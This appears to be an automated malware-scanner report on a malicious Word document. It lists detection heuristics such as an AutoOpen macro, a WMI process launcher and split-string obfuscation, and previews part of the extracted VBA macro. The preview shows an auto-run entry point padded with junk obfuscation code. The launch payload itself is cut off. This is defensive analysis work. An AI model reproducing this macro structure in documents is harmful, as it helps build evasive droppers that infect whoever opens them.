MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro uses GetObject and CreateObject to interact with WMI, specifically launching a process via 'winmgmts:..Win32_Process'. This indicates an attempt to execute arbitrary code, likely to download and run a second-stage payload. The obfuscation of 'winmgmts' by splitting keywords is also noted.
Heuristics 8
- ClamAV: Doc.Malware.00536d-6943632-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29919 bytes |

SHA-256: 5de5c1b8e45613d81f093afb300a91aceed170f9b02968bf20ebdf05b774813a

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "MG1AX1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "axoZwZ"
Attribute VB_Base = "0{C048E48B-2750-47EE-AD27-3D21AD99F581}{AC90A0B1-A6E9-49BA-ADE5-D67CF5FB9B4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JCZXQ4"
Attribute VB_Base = "0{8645C7D1-CB6E-4A8B-A8B4-B0066A491CFC}{C6B5E892-E6D6-42AD-9367-30CF0C3F8CBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ow4UCA"
Sub autoopen()
If NAc4AwAD = wAUGAA Then
Select Case GQAAAwA
Case 167068954
CQkQUU = Rnd(RABDBw + 650495095 + 371117463 / wDQ1AAQA)
zA1AA1Ax = CByte(rAUAUDo + 20487845 + fA1UXUDA + 505403680)
Case 387900406
T1k4Z1C = hXQAAc
uoQQDUA = Tan(D_A1ZQUA - CSng(zDBBDA))
End Select
End If
If j_BBBAQ = aA_DAk Then
Select Case EAwAXBQG
Case 5402959
zBAw4AAA = Rnd(WZDxCQQA + 676616036 + 512829881 / tZo4AA4)
sDUAX_ = CByte(XDADBAwo + 138834269 + zCAAUD + 958147293)
Case 571616047
UAABABAA = EBowkDZA
mkX1DwQA = Tan(Lo4BAA4Q - CSng(pwDZwA))
End Select
End If
X14_BU1
If BAZXBccA = nAQDAwA Then
Select Case CAAUDx
Case 943859877
XCwUAxkZ = Rnd(KAAkBw + 544252862 + 395633711 / TXAUAc)
aAAA4wD = CByte(CxQwkB + 155554610 + uw4XQAAk + 356396423)
Case 238531479
wDAQcwx = vAxCZUcx
FDBDDxA = Tan(Y_okkQD - CSng(jADAAA))
End Select
End If
If uCBGA4Q = ADAUAoXA Then
Select Case JAAAkDo
Case 483674180
I4wAwAAx = Rnd(LQABQA + 891862522 + 573333373 / pkCQZA)
m1XkAU4U = CByte(aAUXAQA + 661755591 + Zc_1cZ + 94742458)
Case 52062674
o_AZ1ZB = lcDcQA
jBA1BA = Tan(nAoAA4 - CSng(Z4ABwoAG))
End Select
End If
End Sub
Attribute VB_Name = "SkcCADX"
Function X14_BU1()
On Error Resume Next
If tZXkXA = uACBZGB Then
Select Case R4xADQ
Case 199961955
N_ZZAA = Rnd(wB44BZ + 892411673 + 494534649 / m4UUDXk_)
ZQAc4XA = CByte(UBAcAU + 5806753 + nDkAwA_ + 888489361)
Case 284077123
RUAZA4 = jcUAGU
kA1UDCAU = Tan(IQGQUo - CSng(nxUQBB))
End Select
End If
If uAZAoAo = j4XQcwx Then
Select Case j1XBc1Q
Case 584221840
LXBAGA = Rnd(so_BxC + 418538847 + 791559013 / TXXU4A)
LAAw_1 = CByte(DkBQZ_UA + 163227692 + p1wAXkZX + 675427222)
Case 980059429
fDQBw4A = w1o1CU
ZxwB1CBc = Tan(FCDXAw - CSng(lcA_QQ))
End Select
End If
If FADZwZ = KQBAocxA Then
Select Case OkDkUDx
Case 906361846
UA1BUx = Rnd(PcoA_oA + 585722260 + 185414287 / tQoAkAD)
RcZAA1UB = CByte(vBQAAA + 494558293 + XUAA4BAA + 498426341)
Case 314639635
QA_A1Z = I_XkAZ
uAA44A = Tan(bDoQAAA - CSng(w4QDBA))
End Select
End If
If 7926 < 83936 Then
PGGUUxA = vbFalse
If MoCoXAGo = rAUAwU Then
Select Case MoQBGA_
Case 599929272
wDA1_DDB = Rnd(VAQ11AD + 710572197 + 341868934 / hkxUACU)
V4AACZ = CByte(JDUGGcX + 824028117 + doQAAAD + 295595727)
Case 957124950
hUCDxxA = SQABQc4U
soUAAA = Tan(RZBABQC - CSng(W1ACDAAA))
End Select
End If
If VAZAUB = S1XQAAo Then
Select Case qBCBAoAA
Case 733598475
JAwxAAx = Rnd(VxQcA
... (truncated)